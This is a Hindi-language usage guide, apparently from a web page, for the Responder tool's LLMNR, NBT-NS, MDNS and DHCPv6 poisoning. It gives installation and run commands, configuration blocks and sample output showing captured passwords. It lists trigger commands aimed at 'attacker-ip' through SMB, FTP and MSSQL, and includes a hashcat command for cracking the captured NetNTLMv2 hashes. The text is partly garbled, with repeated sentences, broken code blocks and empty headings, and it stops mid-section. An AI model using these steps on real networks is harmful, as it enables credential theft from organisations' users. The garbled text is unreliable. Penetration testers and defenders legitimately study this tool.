
Responder एक LLMNR, NBT-NS और MDNS पॉइज़नर है, जिसमें NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP और Basic HTTP प्रमाणीकरण का समर्थन करने वाला अंतर्निहित HTTP/SMB/MSSQL/FTP/LDAP रॉग प्रमाणीकरण सर्वर शामिल है।
Responder एक LLMNR, NBT-NS, और MDNS पॉइज़नर है जिसमें HTTP, SMB, MSSQL, FTP, LDAP, Kerberos, DNS, और अधिक के लिए बिल्ट-इन रॉग ऑथेंटिकेशन सर्वर हैं। यह NTLMv1/NTLMv2/LMv2, एक्सटेंडेड सिक्योरिटी NTLMSSP, और 15+ प्रोटोकॉल में विभिन्न प्रमाणीकरण विधियों का समर्थन करता है।
Responder LLMNR, NBT-NS, और MDNS नाम समाधान अनुरोधों का जवाब देकर क्रेडेंशियल्स कैप्चर करता है। जब कोई क्लाइंट किसी अस्तित्वहीन होस्टनाम को हल करने का प्रयास करता है, तो Responder उत्तर देता है, क्लाइंट को हमलावर की मशीन पर निर्देशित करता है जहाँ कई रॉग ऑथेंटिकेशन सर्वर क्रेडेंशियल्स कैप्चर करते हैं। DHCP, DHCPv6 रॉग सर्वर भी शामिल हैं और इन्हें अलग से सक्षम किया जा सकता है।
कैप्चर किया गया डेटा:
इस संस्करण में शामिल हैं:
sudo apt-get update sudo apt-get install python3 python3-pip python3-netifaces
### Responder स्थापित करें```bash
git clone https://github.com/lgandx/Responder.git
cd Responder
pip3 install -r requirements.txt
sudo python3 Responder.py --help
---
## त्वरित प्रारंभ
### बुनियादी विषाक्तीकरण```bash
# Standard LLMNR/NBT-NS poisoning
sudo python3 Responder.py -I eth0 -v
# Analyze mode (passive monitoring)
sudo python3 Responder.py -I eth0 -A -v
sudo python3 Responder.py -I eth0 --dhcpv6 -v
### बलपूर्वक HTTP Basic Auth```bash
sudo python3 Responder.py -I eth0 -b -v
sudo python3 Responder.py -I eth0 -Pvd
## नेटवर्क विषाक्तीकरण
### LLMNR/NBT-NS/MDNS विषाक्तीकरण
**उद्देश्य:** नाम रिज़ॉल्यूशन विफलताओं का जवाब देना
**यह कैसे काम करता है:**
1. क्लाइंट अस्तित्वहीन होस्ट के लिए प्रश्न प्रसारित करता है
2. रिस्पॉन्डर उत्तर देता है: "मैं वह होस्ट हूँ"
3. क्लाइंट हमलावर से जुड़ता है
4. क्रेडेंशियल्स कैप्चर हो जाते हैं
**कॉन्फ़िगरेशन:**```ini
[Responder Core]
LLMNR = On
NBTNS = On
MDNS = On
उपयोग:```bash sudo python3 Responder.py -I eth0 -v
---
### DHCPv6 सर्वर
**उद्देश्य:** क्लाइंट को IPv6 के माध्यम से हमलावर के DNS का उपयोग करने के लिए बाध्य करें
**विशेषताएं:**
- ✅ INFORMATION-REQUEST समर्थन (Windows 10/11)
- ✅ SOLICIT/REQUEST समर्थन
- ✅ डोमेन फ़िल्टरिंग (सर्जिकल लक्ष्यीकरण)
- ✅ राउटर विज्ञापन (वैकल्पिक)
**यह कैसे काम करता है:**
1. Windows DHCPv6 INFORMATION-REQUEST, SOLICIT, REQUEST भेजता है
2. रिस्पॉन्डर प्रतिक्रिया देता है: DNS = हमलावर का IPv6
3. Windows IPv6 DNS को प्राथमिकता देता है
4. सभी DNS क्वेरी → हमलावर
5. DNS विषाक्तीकरण → क्रेडेंशियल कैप्चर
**कॉन्फ़िगरेशन:**```ini
[DHCPv6 Server]
; Only respond to specific domain
DHCPv6_Domain = corp.local
; Send Router Advertisements
SendRA = Off
; IPv6 address to advertise
BindToIPv6 = fe80::1
उपयोग:```bash sudo python3 Responder.py -I eth0 --dhcpv6 -v
**अपेक्षित आउटपुट:**```
[DHCPv6] INFORMATION-REQUEST from fe80::a1b2:c3d4
[DHCPv6] Client domain: workstation.corp.local
[DHCPv6] Matched target domain: corp.local
[DHCPv6] Responding with DNS: fe80::1
[DNS] Query: mail.corp.local (A)
[DNS] Poisoned: mail.corp.local -> 192.168.1.100
[SMTP] Captured: [email protected]:Password123
Responder में 17+ दुष्ट प्रमाणीकरण सर्वर शामिल हैं:
उद्देश्य: फ़ाइल शेयरों से NetNTLM हैश कैप्चर करना
विशेषताएँ:
ट्रिगर:```powershell
\attacker-ip\share \non-existent-server\files
net use \attacker-ip\share
\attacker-ip\
**कैप्चर किया गया प्रारूप:**```
username::domain:challenge:response:blob
क्रैकिंग:```bash hashcat -m 5600 smb-ntlmv2.txt wordlist.txt
**कॉन्फ़िगरेशन:**```ini
[Responder Core]
SMB = On
उद्देश्य: क्लियरटेक्स्ट FTP क्रेडेंशियल्स कैप्चर करना
विशेषताएं:
ट्रिगर:```bash ftp attacker-ip
**कैप्चर प्रारूप:**```
[FTP] Cleartext: username:password
कॉन्फ़िगरेशन:```ini [Responder Core] FTP = On
---
### डेटाबेस सर्वर
#### MSSQL सर्वर (पोर्ट 1433)
**उद्देश्य:** Microsoft SQL Server प्रमाणीकरण कैप्चर करें
**विशेषताएँ:**
- ✅ SQL Server प्रमाणीकरण
- ✅ विंडोज़ प्रमाणीकरण (NTLM)
- ✅ स्पष्ट टेक्स्ट SQL क्रेडेंशियल्स
- ✅ NetNTLMv2 हैश कैप्चर
**ट्रिगर्स:**```sql
-- SQL Server Management Studio
Server: attacker-ip
Authentication: SQL Server / Windows
-- Command line
sqlcmd -S attacker-ip -U sa -P password
-- Connection strings
Server=attacker-ip;Database=master;User Id=sa;Password=pass;
कैप्चर किए गए प्रारूप:``` [MSSQL] SQL Auth: sa:password123 [MSSQL] NetNTLMv2: DOMAIN\user::domain:challenge:response:blob
**विन्यास:**```ini
[Responder Core]
SQL = On
नोट्स:
उद्देश्य: ईमेल क्लाइंट प्रमाणीकरण को कैप्चर करना
विशेषताएं: